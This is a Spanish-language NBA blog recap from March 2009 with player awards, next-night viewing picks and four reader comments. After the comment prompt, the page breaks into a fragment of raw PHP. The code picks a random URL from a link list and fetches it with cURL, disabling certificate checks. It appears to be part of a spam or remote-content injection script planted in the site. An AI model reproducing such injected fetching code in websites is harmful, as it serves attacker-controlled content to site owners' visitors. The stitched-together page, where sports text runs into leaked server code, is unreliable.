La Crónica (26/03/2009)

27 de March de 2009 por TheDeerHunter

Jornada de jueves que, como los buenos perfumes, viene en pequeñas dosis. Tres interesantes partidos que se hubiesen merecido el no pegar ojo en toda la noche de no ser por que somos gente responsable y con obligaciones… Sólo tuvimos narices de tragarnos uno.

Los Lakers visitaron el Palace de Auburn Hills, escenario de recientes pesadillas para ellos. Poco queda ahora de aquella temible plaza y ahora se juega a arreones de equipo pequeño de la mano de la improvisación y de insospechados recursos (¿dónde tenían escondido a Will Bynum hasta hace nada?). Los Lakers y su fea costumbre de disfrazarse de charanga de barrio a ratos dieron vidilla al partido en la primera parte pero tan sólo resultó un espejismo. A pesar de que una de las teóricas mejores segundas líneas de la liga jugó a no sabemos muy bien qué, el partido cayó finalmente del lado amarillo por su propio peso. Para los locales es imposible optar a nada anotando un total de 25 puntos en dos cuartos y con un 23% de acierto en triples.

En el otro partido del Oeste los enrachados Suns visitiaban la cancha del Rose Garden en Portland. Mal sitio para dar continuidad a la remontada y más todavía si Stromile Swift tiene que salir del banco para sacarte las castañas del fuego. Partidazo de Roy&Aldridge rematado por Sergio&Rudy. El canario dio 8 asistencias en 14 minutos y Rudy anotó 23ptos con un 80% de acierto pero no terminamos de tener claro si McMillan se quedaría satisfecho de ambas actuaciones. No nos extrañaría que Sergio no jugara ni un minuto el próximo partido no vaya a ser que se acostumbre a la buena vida.

Por último, a Wade se le acaban las balas para defender su candidatura al MVP. Buen partido el suyo, como casi siempre, pero esta vez se encontró con unos Bulls compensadísimos, todo lo contrario que los Heat. Partidazo de Salmons y 6 bulls por encima de los 10 puntos. Dato: Derrick Rose empezó el partido desde el banco pero cuajó una buena actuación.

PREMIOS

MVP: Cuando más perdidos y apáticos jugaban los Lakers apareció Kobe Bryant para firmar un partido muy completo. 30 puntos, 8 rebotes y 7 asistencias. También Brandon Roy cuajó una gran actuación. 26 puntos, 9 rebotes y 6 asistencias. Los 2 se quedaron cerquita del triple doble.

Rookie: Derrick Rose salió desde el banco y consiguió 9 puntos, 5 rebotes y 7 asistencias pero el mejor rookie anoche fue Rudy Fernández que apuntilló a los Suns con 8 de 10 en tiros y 23 puntos y todo el Rose Garden coreando el Ruuudy!!, Ruuudy!!.

Sorpresa: Ya lo comentábamos en la crónica. ¿De dónde ha salido Will Bynum? Ayer 25 puntos y 11 asistencias y no es el primer buen partido que hace. También destacable el partido del olvidado Stromile Swift, ex número 2 del draft. 12 puntos y 6 rebotes.

Decepción: Si Will Bynum es el más destacado de los Pistons es que algo falla. Por un lado las numerosas lesiones y por el otro la nula aportación de gente como Rodney Stuckey o Tayshaun Prince. 5 de 21 ayer entre los dos.

El mayor esfuerzo en vano: Claramente el de Dwyane Wade, demasiado solo en estos Heat. 31 puntos, 4 rebotes, 5 asistencias.

RAZONES PARA TRASNOCHAR

La próxima madrugada, como buen viernes que es, hay programados partidos hasta hartarse aunque lamentablemente no todos con excesivo valor añadido ni especial interés. Con todo, os ofrecemos nuestra selección para que todavía lo tengáis más fácil a la hora de elegir.

Por comodidad, en abierto y falso directo tenemos el Lakers @ New Jersey a las 3:30h de la mañana (en internet a la 1:30h). Nunca viene mal meterse entre pecho y espalda un duelo Vince vs Kobe y, ¿porqué no?, un Gasol vs Brook Lopez también mola. Bien podría complicársele a los amarillos jugando fuera y tras “el desgaste” de ayer por lo que al final incluso podrá resultar emocionante a pesar de la teórica diferencia entre ambos equipos.

Por nivel, no cabe duda de que una visita de Boston a Atlanta tras la primera ronda del año pasado tiene un morbazo alucinante. Además, con los problemas por los que atraviesan los campeones y lo que se están jugando es más que posible que la igualdad y la emoción marquen el devenir del choque. Lo veremos a la 1:30h por internet. Otro partido altamente recomendable es el Denver @ Dallas donde seguro que podrá verse un buen saco de canastones. Eso sí, habrá que trasnochar un poco más, como cualquier partido del Oeste. 2:30h.

En este último partido bien podemos encontrar los jugadores a seguir esta noche. Siempre supone un placer ver en acción a Robin Hood, aunque últimamente lo tengamos algo olvidado a favor de Lebrones, Kobes, Wades o Howards… Y a su lado un Jason Terry que se mantiene en la puja por el 6º hombre y que está haciendo su mejor temporada de los últimos años. Enfrente, l’enfant terrible Melo y su antítesis Billups luchan por lograr ventaja campo en primera ronda. Todos los ingredientes individuales que nos hacen falta si podemos aguantar el sueño hasta esa hora. Que lo paséis bien…

LA PREGUNTA DEL DÍA

Con Salmons en el estado de forma en el que se encuentra, ¿sería Deng sano una ayuda o un problema para los actuales Bulls?

Comenta

4 comentarios a esta entrada

  1. couxe dice:
    #1

    Espectacular los 5 puntos más un robo de balón en 1.7 segundos que ha hecho Rudy… Acojonante…

      Citar

  2. Txusma dice:
    #2

    Y aqui el enlace para quien no haya visto la jugada:
    http://www.youtube.com/watch?v=769KGjxPO2s

    Sobre los Bulls, si una cosa se aprende al cabo de los años es que las cosas que funcionan mas vale no tocarlas. Cuando vuelva Deng, creo que tendra que adaptarse a salir desde el banco. Un banquillo con Rose, Deng y Miller es toda una garantia para, al menos, dar algun susto a Orlando o Boston.

      Citar

  3. Jabho dice:
    #3

    Los Bulls muy enrachados trás la adquisición de Brad Miller y la recuperación de hinrich… miedo dan.

    COmo Txus, unos Bulls que no han dado una en dos años de repente van y ganan lo que juegan.Mejor no meneallo.

      Citar

  4. Dantley dice:
    #4

    Enorme esos 5 puntos, impresionante ¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>